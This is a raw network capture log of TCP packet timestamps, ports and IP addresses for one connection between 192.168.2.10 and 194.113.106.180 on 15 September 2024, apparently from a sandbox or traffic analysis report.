Sep 15, 2024 15:02:27.195466995 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.195492983 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.196141958 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196152925 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196165085 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196182013 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.196201086 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196203947 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.196213961 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196228027 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196237087 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.196238995 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196266890 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.196285963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196296930 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196341038 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.196358919 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.196373940 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196387053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196398020 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196408987 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196422100 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196432114 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.196433067 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196444988 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.196469069 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.196528912 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196541071 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196552038 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196561098 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.196567059 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196584940 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.196595907 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196614981 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196631908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196633101 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.196651936 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196666956 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.196671963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196690083 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196706057 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.196711063 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196729898 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196744919 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.196748972 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.196784973 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.197068930 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197159052 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197176933 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197195053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197199106 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.197223902 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197232008 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.197243929 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197263002 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197278976 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.197283030 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197302103 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197319031 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.197331905 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197351933 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197367907 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.197371006 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197391033 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197407007 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.197410107 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197431087 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197448015 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.197448969 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197479010 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197482109 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.197498083 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197519064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197529078 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.197539091 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197557926 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197575092 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.197577000 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197597027 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197609901 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.197614908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197633028 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197649956 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.197652102 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197671890 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197685957 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.197690964 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197710037 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197724104 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.197730064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.197765112 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.198043108 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198061943 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198080063 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198096991 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.198097944 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198118925 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198151112 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.198203087 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198223114 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198241949 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198244095 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.198261023 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198273897 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.198287010 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198313951 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198323965 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.198334932 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198354006 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198369026 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.198373079 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198391914 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198409081 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.198410988 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198431969 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198446989 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.198463917 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198483944 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198498964 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.198503971 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198523998 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.198539019 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.201209068 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.201247931 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.201262951 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.201281071 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.201318026 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.201335907 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.201351881 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.201364040 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.201374054 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.201381922 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.201386929 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.201409101 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.219688892 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.219702005 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.219712019 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.219723940 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.219736099 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.219747066 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.219748020 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.219762087 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.219774008 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.219779015 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.219793081 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.220930099 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.220984936 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.220990896 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.221023083 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.221064091 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.221072912 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.221107960 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.221142054 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.221149921 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.221178055 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.221213102 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.221216917 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.229581118 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.229610920 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.229645967 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.229662895 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.229700089 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.229707956 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.229734898 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.229768991 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.229778051 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.229804993 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.229837894 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.229846954 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.234276056 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.234306097 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.234328985 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.234360933 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.234394073 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.234405041 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.234427929 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.234462023 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.234468937 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.234496117 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.234529972 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.234538078 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.240967989 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.241020918 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.241030931 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.241055965 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.241101980 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.241107941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.241142035 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.241174936 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.241179943 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.241209984 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.241251945 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.251158953 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.251353979 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.251409054 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.251413107 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.251488924 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.251535892 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.251538992 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.251595974 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.251636028 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.251640081 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.251682043 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.251713991 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.251724005 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.251764059 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.251805067 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.251816034 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.251852989 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.251888990 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.251892090 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.251923084 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.251974106 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.251981020 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.252008915 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.252043962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.252052069 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.254215956 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.254272938 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.254323959 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.254359007 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.254403114 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.254481077 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.254511118 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.254543066 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.254549980 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.254595995 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.254626036 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.254637003 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.254738092 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.254767895 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.254779100 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.254971027 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.255012989 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.259689093 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.259721041 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.259769917 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.259772062 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.259805918 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.259840012 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.259857893 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.259875059 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.259907961 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.259917974 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.259943008 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.259984016 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.267147064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.267241001 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.267277002 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.267303944 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.267313957 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.267349005 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.267362118 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.267411947 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.267456055 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.267457962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.267496109 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.267538071 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.270529032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.270565987 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.270602942 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.270620108 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.270657063 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.270692110 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.270701885 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.270729065 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.270765066 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.270771980 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.274858952 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.274893999 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.274919987 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.274930000 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.274966002 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.275002003 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.275007010 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.275036097 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.275041103 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.275072098 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.275115967 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.276922941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.276974916 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.277009964 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.277025938 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.277045012 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.277079105 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.277086020 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.277112961 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.277148962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.277153015 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.283073902 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.283128977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.283130884 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.283164978 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.283205986 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.283272028 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.283282042 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.283318043 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.283344030 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.283353090 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.283405066 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.289012909 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.289047003 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.289082050 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.289102077 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.289156914 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.289191961 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.289206982 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.289227962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.289262056 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.289273024 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.292025089 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.292068958 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.292079926 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.292134047 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.292167902 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.292176008 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.292205095 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.292239904 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.292254925 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.292265892 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.292275906 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.292310953 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.292349100 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.292360067 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.322144032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.322171926 CEST	3736	49701	194.113.106.180	192.168.2.10
